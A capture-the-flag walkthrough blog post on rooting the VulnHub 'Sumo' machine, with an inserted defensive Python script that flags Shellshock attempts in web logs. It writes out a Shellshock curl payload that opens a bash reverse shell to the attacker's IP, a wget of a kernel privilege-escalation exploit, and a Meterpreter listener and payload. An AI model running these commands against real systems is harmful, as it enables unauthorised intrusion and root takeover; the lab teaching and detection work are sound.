Sumo Vulnhub Walkthrough


In this article, we play another VulnHub box, Sumo, created by the SunCSR Team. This VM is beginner level; you can download it here: sumo: 1 CTF

Goal

Get a root shell (i.e. [email protected]:~#) and then obtain the flag under /root.

Network Scanning

First we discover our target IP address using the netdiscover tool.

netdiscover

Now that we have our target IP address, our next step is to scan the target machine's ports and services using an nmap aggressive scan (-A).

nmap -A 192.168.43.233

Enumeration

Our target has two open ports: 22 (SSH) and 80 (HTTP). To enumerate, we open the HTTP service in a web browser.

http://192.168.43.233

At this point we have no clue what to do next, so we choose the Nikto web vulnerability scanner.

nikto --url http://192.168.43.233/

After the Nikto scan completes, we find the directory /cgi-bin/test, which is vulnerable to the Shellshock exploit. Before executing the curl command, we first start our netcat listener.

nc -lvp 4545
curl -v -A "() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/192.168.43.103/4545 0>&1'" http://192.168.43.233/cgi-bin/test/test.cgi
id
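
From the defender's side, the request above leaves a recognisable trace in the web server's access log: a header value containing the bash function-definition prefix "() {". The following is an added example, not part of the original walkthrough, that scans combined-format log lines for that prefix in the Referer and User-Agent fields; the function names and sample log lines are constructed for illustration.

```python
import re

# Apache/Nginx "combined" log format:
# ip ident user [time] "METHOD path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"\s*$'
)
# A header value that starts a bash function definition, "() {", is the Shellshock trigger.
FUNC_DEF_RE = re.compile(r'\(\)\s*\{')
# Paths that usually hand request headers to a CGI script as environment variables.
CGI_RE = re.compile(r'^/cgi-bin/|\.(?:cgi|sh|pl)(?:\?|$)', re.IGNORECASE)

def find_shellshock_attempts(lines):
    """Return one finding per log line whose Referer or User-Agent carries '() {'."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        for field in ("referer", "agent"):
            if FUNC_DEF_RE.search(m.group(field)):
                findings.append({
                    "line": lineno,
                    "ip": m.group("ip"),
                    "path": m.group("path"),
                    "header": field,
                    # CGI targets are where the header actually reaches bash
                    "cgi_target": bool(CGI_RE.search(m.group("path"))),
                    "status": int(m.group("status")),
                })
                break
    return findings

# Constructed sample log lines (not captured from the walkthrough's target).
SAMPLE_LOG = [
    '192.168.43.50 - - [01/Jan/2020:10:00:01 +0000] "GET / HTTP/1.1" 200 177 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.168.43.103 - - [01/Jan/2020:10:02:13 +0000] "GET /cgi-bin/test/test.cgi HTTP/1.1" 200 14 "-" "() { :;}; echo probe"',
    '192.168.43.103 - - [01/Jan/2020:10:02:40 +0000] "GET /index.html HTTP/1.1" 200 177 "() { :; }; echo probe" "curl/7.58.0"',
    '192.168.43.50 - - [01/Jan/2020:10:03:00 +0000] "GET /cgi-bin/test/test.cgi HTTP/1.1" 200 14 "-" "curl/7.58.0"',
]

if __name__ == "__main__":
    for finding in find_shellshock_attempts(SAMPLE_LOG):
        print(finding)
```

Other request headers can carry the same prefix but are not recorded in the combined log format, so this check covers only the two logged fields.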

After executing the curl command, we have a reverse shell on the target machine. We try to find a SUID binary but fail, so we run the uname -r command, which shows the target machine's kernel version.

This kernel version is vulnerable to the 'perf_swevent_init' local privilege escalation. We move to the /tmp directory and download the exploit.

uname -r
wget http://192.168.43.103/k_exploit.c

Then we compile the exploit, but at compile time we see an error: gcc: error trying to exec 'cc1': execvp:

chmod 777 kernal.c
gcc kernal.c -O2 -o hackNos

Now we have a big problem: after compiling the exploit, our VM crashes. We then create a Linux Meterpreter reverse payload and use the wget command to download it into the target machine's /tmp directory.

Next we run msfconsole, load the multi/handler module, and set up a listener for the Linux Meterpreter payload.

msfconsole -x "use exploit/multi/handler"
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.43.103
set lport 4444
run

Our Metasploit listener has started. We add execute permission to our payload and then run it using the command:

chmod +x payload.elf && ./payload.elf
shell
python -c 'import pty;pty.spawn("/bin/bash")'

Again we go to the /tmp directory, recompile the exploit, give all users read, write, and execute permission on it, and run the exploit.

gcc kernal.c -O2 -o hackNos
chmod 777 hackNos && ./hackNos 0

Our exploit runs successfully and we get a root shell on the target machine, so let's move to the /root directory and read our root.txt flag.

cd /root
ls
cat root.txt

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.


One Comment on “Sumo Vulnhub Walkthrough”

  1. Hello, in the privilege promotion part, there is no root return after compiling and executing in my MSF session. Have you ever been in this situation?
